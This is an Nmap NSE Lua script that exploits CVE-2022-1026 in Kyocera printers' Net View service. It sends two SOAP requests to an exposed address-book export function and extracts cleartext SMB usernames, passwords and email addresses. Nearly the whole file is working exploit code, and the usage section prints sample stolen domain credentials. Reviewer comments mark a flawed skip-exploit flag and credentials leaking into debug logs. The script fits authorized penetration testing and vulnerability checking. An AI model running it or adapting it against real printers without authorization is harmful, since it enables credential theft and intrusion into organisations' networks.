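local http = require "http"
local stdnse = require "stdnse"
local string = require "string"

description = [[
Recovers SMB credentials and Email addresses from the
address book of vulnerable Kyocera mutifunction printers.
Kyocera multifunction printers running vulnerable versions
of Net View unintentionally expose sensitive user information,
including usernames and passwords, through an insufficiently
protected address book export function.
Net view is ran by default over http or https on TCP ports 9090
or 9091 respectively. To specify a custom TCP port pass the
<code>kyocera.port</code> argument.
To only check for vulnerability and skip exploiting the target
host pass 'true' to the <code>kyocera.skipexploit</code> parameter.
]]

---
-- @usage
-- nmap --script=http-vuln-cve2022-1026 192.168.50.45
--
-- @output
-- Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 11:12 EDT
-- Nmap scan report for PRINTER01.phrack.com (192.168.50.45)
-- Host is up (0.030s latency).
-- Not shown: 991 closed tcp ports (conn-refused)
-- PORT STATE SERVICE
-- 80/tcp open http
-- 515/tcp open printer
-- 631/tcp open ipp
-- 9090/tcp open zeus-admin
-- | http-vuln-cve2022-1026:
-- | -- SMB Credentials
-- | Username: phrack.com\scanmanager
-- | Password: G48n4&##JJKL32$
-- | -- Emails
-- 9100/tcp open jetdirect
--
-- @usage
-- nmap --script=http-vuln-cve2022-1026 --script-args kyocera.port=9090,kyocera.skipexploit=true 192.168.50.45
--
-- @args kyocera.port specify alternative TCP port (default 9090)
-- @args kyocera.skipexploit check if vulnerable but do not exploit;
--       any supplied value (including "false") enables the skip
--
-- @output
-- Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 11:17 EDT
-- Nmap scan report for PRINTER01.phrack.com (192.168.50.45)
-- Host is up (0.028s latency).
-- Not shown: 991 closed tcp ports (conn-refused)
-- PORT STATE SERVICE
-- 80/tcp open http
-- 443/tcp open https
-- 515/tcp open printer
-- 631/tcp open ipp
-- 9090/tcp open zeus-admin
-- |_http-vuln-cve2022-1026: VULNERABLE
-- 9100/tcp open jetdirect

author = "Shain Lakin"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"

-- Not "safe": unless kyocera.skipexploit is set, the action performs the
-- address-book export and returns the extracted credentials, which is
-- exactly what Nmap's "safe" category promises a script will not do.
-- "intrusive" keeps the script out of `--script safe` selections.
categories = {"intrusive", "exploit", "vuln"}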
--- Port rule: run only against the configured TCP port.
-- The port comes from the <code>kyocera.port</code> script argument;
-- a missing or non-numeric value falls back to 9090.
-- @param host Nmap host table (unused).
-- @param port Nmap port table; <code>number</code> and
--   <code>protocol</code> are compared.
-- @return boolean true when the port matches.
portrule = function(host, port)
  local wanted = tonumber(stdnse.get_script_args("kyocera.port")) or 9090
  if port.protocol ~= "tcp" then
    return false
  end
  return port.number == wanted
end
--- Script action for a matching port.
-- Sends the address-book enumeration request; if the reply carries an
-- enumeration id the host is treated as vulnerable. Unless
-- <code>kyocera.skipexploit</code> is set, a second request fetches the
-- exported entries and the login fields they contain.
-- @param host Nmap host table, passed through to http.post.
-- @param port Nmap port table; only <code>port.number</code> is used.
-- @return string A status line, or the extracted address-book data.
action = function(host, port)
local url = "/ws/km-wsdl/setting/address_book"
-- NOTE(review): `headers` is never used; both http.post calls below pass an
-- empty options table instead.
local headers = {['Content-Type'] = 'application/soap+xml'}
-- NOTE(review): script args arrive as strings, so any supplied value
-- (including "false") is truthy; only omitting the argument disables the skip.
local skip_exploit = stdnse.get_script_args('kyocera.skipexploit') or false
local post_data1 = [[
<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope"
xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:xop="http://www.w3.org/2004/08/xop/include"
xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book">
<SOAP-ENV:Header>
<wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration</wsa:Action>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:create_personal_address_enumerationRequest>
<ns1:number>25</ns1:number>
</ns1:create_personal_address_enumerationRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
]]
-- First POST request
local response1 = http.post(host, port.number, url, nil, {}, post_data1)
-- Only a missing `status` (presumably a transport-level failure) is treated
-- as an error; an HTTP error code is a number and therefore passes this check.
if not response1.status then
return("HTTP request failed")
end
-- The numeric enumeration id in the reply is the sole vulnerability signal.
local enumeration = string.match(response1.body, '<kmaddrbook:enumeration>([%d]+)<')
if not enumeration then
return("NOT VULNERABLE")
elseif skip_exploit then
return("VULNERABLE")
end
local post_data2 = [[
<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope"
xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:xop="http://www.w3.org/2004/08/xop/include"
xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book">
<SOAP-ENV:Header>
<wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list</wsa:Action>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:get_personal_address_listRequest><ns1:enumeration>]]..enumeration..[[</ns1:enumeration></ns1:get_personal_address_listRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>
]]
-- Second POST request
local response2 = http.post(host, port.number, url, nil, {}, post_data2)
-- Same check as above: only a missing `status` counts as a failed request.
if not response2.status then
return("HTTP request failed")
end
-- NOTE(review): the complete raw response, credentials included, is written
-- to Nmap's debug output here; debug logs therefore need the same handling
-- as the script output itself.
stdnse.print_debug("Raw output:\n" .. response2.body)
-- Parse email addresses
local emails = {}
-- `.-` is the shortest match, so one entry per <kmaddrbook:address> element;
-- empty elements are dropped.
for email in string.gmatch(response2.body, '<kmaddrbook:address>(.-)</kmaddrbook:address>') do
if email ~= "" then
table.insert(emails, email)
end
end
-- Parse login credentials
-- string.match returns the first match only, so a single login_name /
-- login_password pair is reported even if the export holds several.
local username = string.match(response2.body, '<kmaddrbook:login_name>(.-)</kmaddrbook:login_name>')
local password = string.match(response2.body, '<kmaddrbook:login_password>(.-)</kmaddrbook:login_password>')
if username and password then
-- Credentials are returned in cleartext in the script output; scan results
-- and logs must be protected like any other credential store.
local output = ("\n-- SMB Credentials:\nUsername: %s\nPassword: %s"):format(username, password)
if #emails > 0 then
output = output .. "\n-- Emails:\n" .. table.concat(emails,'\n')
end
return output
else
-- Enumeration succeeded but no login fields were found: the service is still
-- reported as vulnerable so the finding is not lost.
return "VULNERABLE but no data available"
end
end